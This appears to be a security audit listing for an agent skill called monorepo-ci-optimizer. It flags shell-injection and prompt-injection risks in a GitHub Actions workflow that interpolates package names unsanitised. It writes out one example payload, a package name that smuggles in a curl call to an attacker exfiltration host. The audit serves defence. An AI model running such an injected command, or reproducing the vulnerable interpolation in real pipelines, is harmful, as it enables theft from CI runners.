The Agent Skills Directory

[COMMAND_EXECUTION] (HIGH): Vulnerable shell interpolation in GitHub Actions. The provided YAML workflow uses ${{ matrix.package }} directly in a run step: pnpm --filter ${{ matrix.package }} test. Since the package list is derived from the name field of package.json files within the repository, an attacker can submit a Pull Request containing a malicious package name (e.g., evil-pkg; curl http://attacker.com/exfil) to execute arbitrary commands on the CI runner.\n- [PROMPT_INJECTION] (HIGH): Indirect injection surface (Category 8). The script scripts/get-affected.ts ingests untrusted data from the workspace (package.json files) and passes it to the CI environment via ::set-output. It lacks sanitization or validation of the extracted package names. Under Category 8 guidelines, this is rated HIGH because it involves processing external content with direct downstream write/execute capabilities in the CI pipeline.

monorepo-ci-optimizer